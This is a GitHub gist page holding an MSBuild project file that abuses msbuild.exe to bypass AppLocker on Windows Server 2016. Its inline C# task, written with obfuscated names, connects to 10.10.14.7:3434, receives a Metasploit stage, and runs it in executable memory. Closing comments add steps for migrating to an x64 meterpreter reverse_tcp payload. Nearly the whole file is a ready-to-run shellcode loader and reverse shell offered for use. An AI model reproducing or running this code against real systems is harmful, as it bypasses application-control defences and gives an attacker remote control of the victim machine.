Skip to content

Instantly share code, notes, and snippets.

@dualfade

dualfade/msbuild.exe msf reverse shell x86

Last active February 6, 2019 02:34
Show Gist options
  • Save dualfade/78df813bfb5f6f19f12e37eb7db52c68 to your computer and use it in GitHub Desktop.
Save dualfade/78df813bfb5f6f19f12e37eb7db52c68 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
msbuild.exe msf reverse shell x86
//Applocker bypass - Windows 2016 (Build 14393) x64
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml
//Microsoft (R) Build Engine version 4.6.1586.0
//[Microsoft .NET Framework, version 4.0.30319.42000]
//Copyright (C) Microsoft Corporation. All rights reserved.
//Build started 2/5/2019 8:55:26 PM.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<Target Name="TGaywVtZz">
<yymnTWKasHV />
</Target>
<UsingTask
TaskName="yymnTWKasHV"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
public class yymnTWKasHV : Task, ITask {
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 FZzLxk,UInt32 GaYMcefbEK, UInt32 GFGltjlHN, UInt32 rUfXcRhhWyT);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 EEKWyVg, UInt32 DCQjzDiQ, UInt32 yUAshCNzdWWyiuX,IntPtr qcoQmEAsCYVxJN, UInt32 cwTzTaaIonmPyx, ref UInt32 NIQSzWsYXEXJ);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr ghbDXrzbbkU, UInt32 JRLCRpITaqhthxo);
static byte[] XLiKrUiHVLg(string MWGKqRcvxKiCxsD, int WfkhTLYBl) {
IPEndPoint AljjdKQhXFar = new IPEndPoint(IPAddress.Parse(MWGKqRcvxKiCxsD), WfkhTLYBl);
Socket AOjJkaknaCLabUb = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { AOjJkaknaCLabUb.Connect(AljjdKQhXFar); }
catch { return null;}
byte[] mdoldF = new byte[4];
AOjJkaknaCLabUb.Receive(mdoldF, 4, 0);
int MgAnjUozvMDSsv = BitConverter.ToInt32(mdoldF, 0);
byte[] KCEwzCyVtln = new byte[MgAnjUozvMDSsv + 5];
int fjlRsQatOOXVF = 0;
while (fjlRsQatOOXVF < MgAnjUozvMDSsv)
{ fjlRsQatOOXVF += AOjJkaknaCLabUb.Receive(KCEwzCyVtln, fjlRsQatOOXVF + 5, (MgAnjUozvMDSsv - fjlRsQatOOXVF) < 4096 ? (MgAnjUozvMDSsv - fjlRsQatOOXVF) : 4096, 0);}
byte[] HUDMCDCGhunIblU = BitConverter.GetBytes((int)AOjJkaknaCLabUb.Handle);
Array.Copy(HUDMCDCGhunIblU, 0, KCEwzCyVtln, 1, 4); KCEwzCyVtln[0] = 0xBF;
return KCEwzCyVtln;}
static void xxtKMgGJV(byte[] jLKRseom) {
if (jLKRseom != null) {
UInt32 XewKEzI = VirtualAlloc(0, (UInt32)jLKRseom.Length, 0x1000, 0x40);
Marshal.Copy(jLKRseom, 0, (IntPtr)(XewKEzI), jLKRseom.Length);
IntPtr FGAnYqQsIBfSRGz = IntPtr.Zero;
UInt32 APoDWpuRSVvZO = 0;
IntPtr GHFmTAQDl = IntPtr.Zero;
FGAnYqQsIBfSRGz = CreateThread(0, 0, XewKEzI, GHFmTAQDl, 0, ref APoDWpuRSVvZO);
WaitForSingleObject(FGAnYqQsIBfSRGz, 0xFFFFFFFF); }}
public override bool Execute()
{
byte[] vKluxGThzSA = null; vKluxGThzSA = XLiKrUiHVLg("10.10.14.7", 3434);
xxtKMgGJV(vKluxGThzSA);
return true; } }
]]>
</Code>
</Task>
</UsingTask>
</Project>
// Migrate -> x64
// use windows/local/payload_inject
// set payload windows/x64/meterpreter/reverse_tcp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment